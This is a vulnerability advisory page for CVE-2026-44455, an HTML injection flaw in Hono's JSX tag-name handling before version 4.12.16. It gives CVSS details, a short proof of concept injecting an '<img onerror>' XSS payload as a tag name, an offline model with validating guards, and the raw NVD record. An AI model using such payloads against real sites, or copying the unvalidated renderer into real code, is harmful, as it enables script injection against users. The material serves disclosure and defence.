Security Vulnerability Report
CVE-2026-44455 CVSS 4.7 MEDIUM

Published: 2026-05-13 16:16:57
Last Modified: 2026-05-13 18:35:24

Description

Hono is a web application framework that runs on any JavaScript runtime. Prior to 4.12.16, improper handling of JSX element tag names in hono/jsx allowed unvalidated tag names to be inserted directly into the generated HTML output. When untrusted input is used as a tag name via the programmatic jsx() or createElement() APIs during server-side rendering, specially crafted values can break out of the intended element context and inject unintended HTML. Applications that only use JSX syntax with literal tag names, or that never let request data reach the tag-name argument, are not exposed. This vulnerability is fixed in 4.12.16.

CVSS Details

CVSS Score
4.7 (the record's Secondary metric; NVD's own Primary metric is listed below)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

NVD's Primary assessment in the raw record below scores the same issue 6.1 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N; the two differ only in Attack Complexity (High vs Low). Both agree on network reachability, no privileges, user interaction required and a scope change (the injected HTML executes in the victim's browser, not in the rendering server).

Weakness
CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, "Injection")

Configurations (Affected Products)

cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:* - VULNERABLE
Hono < 4.12.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Vulnerable code example (Hono < 4.12.16)
import { jsx } from 'hono/jsx';

// Simulated user-controlled input acting as a tag name
const userTag = '<img src=x onerror=alert(1)>';

// Rendering with untrusted input as the tag name
const result = jsx(userTag, {});

// JSXNode.toString() produces the HTML. Because the tag name is interpolated
// without validation, the output contains the injected <img ... onerror=...>
// element, which leads to XSS once the markup is sent to a browser.
console.log(result.toString());
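The snippet above needs Hono installed to run. The following added example (written for this page, not Hono's code) models the same failure offline: a stand-in renderer that interpolates the tag name unvalidated, as the advisory describes, next to two hardened wrappers that check the tag name before it reaches the renderer. The renderer, the tag-name regex and the fallback strategy are this example's own choices and are not the check that Hono 4.12.16 ships; the untrusted input is constructed for the demonstration.

```javascript
// Added example, not Hono's code: a minimal model of how an unvalidated tag
// name reaches HTML output, and two guards that stop it at the call site.

// Attribute values are escaped, as any sane renderer does. That leaves the
// tag name as the only unescaped path into the markup.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Stand-in for the pre-4.12.16 behaviour described in the advisory: the tag
// name is interpolated verbatim into both the opening and closing tag.
function renderUnvalidated(tag, props = {}, ...children) {
  const attrs = Object.entries(props)
    .map(([name, value]) => ` ${name}="${escapeAttr(value)}"`)
    .join('');
  return `<${tag}${attrs}>${children.join('')}</${tag}>`;
}

// Tag-name grammar accepted here (this example's choice, not Hono's check):
// an ASCII letter followed by letters, digits or hyphens. That covers standard
// elements and custom elements, and rejects whitespace, '<', '>', '/', '=' and
// quotes, i.e. everything needed to close or extend the element context.
const TAG_NAME = /^[A-Za-z][A-Za-z0-9-]*$/;

function isSafeTagName(tag) {
  return typeof tag === 'string' && TAG_NAME.test(tag);
}

// Guard 1: fail closed. Untrusted tag names are a programming error at the
// boundary, so refuse to render rather than guess.
function renderValidated(tag, props = {}, ...children) {
  if (!isSafeTagName(tag)) {
    throw new TypeError(`refusing to render untrusted tag name: ${JSON.stringify(tag)}`);
  }
  return renderUnvalidated(tag, props, ...children);
}

// Guard 2: degrade. Render a fixed element and keep the rejected value only
// where it is escaped, so it can still be logged or displayed safely.
function renderOrFallback(tag, props = {}, ...children) {
  return isSafeTagName(tag)
    ? renderUnvalidated(tag, props, ...children)
    : renderUnvalidated('span', { 'data-rejected-tag': tag }, ...children);
}

// Constructed input: a "tag name" that is really a complete element.
const untrustedTag = '<img src=x onerror=alert(1)>';

console.log('vulnerable :', renderUnvalidated(untrustedTag, {}, 'hello'));
console.log('fallback   :', renderOrFallback(untrustedTag, {}, 'hello'));
try {
  renderValidated(untrustedTag, {}, 'hello');
} catch (err) {
  console.log('validated  :', err.message);
}
```

The check belongs at the point where a request value is about to become a tag-name argument, not deep inside the renderer, because that is where you know whether the value was ever meant to be an element name. If the application only needs a handful of elements (say `h1` to `h6` for a configurable heading level), an explicit allowlist is stricter than the regex and is the better choice.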

References

https://github.com/honojs/hono/security/advisories/GHSA-69xw-7hcm-h432 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44455",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T16:16:57.433",
    "lastModified": "2026-05-13T18:35:24.373",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.16, Improper handling of JSX element tag names in hono/jsx allowed unvalidated tag names to be directly inserted into the generated HTML output. When untrusted input is used as a tag name via the programmatic jsx() or createElement() APIs during server-side rendering, specially crafted values may break out of the intended element context and inject unintended HTML. This vulnerability is fixed in 4.12.16."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7},
        {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.12.16", "matchCriteriaId": "D9D38D7B-A561-44B9-8571-C5241E5F36DE"}]}]}
    ],
    "references": [
      {"url": "https://github.com/honojs/hono/security/advisories/GHSA-69xw-7hcm-h432", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}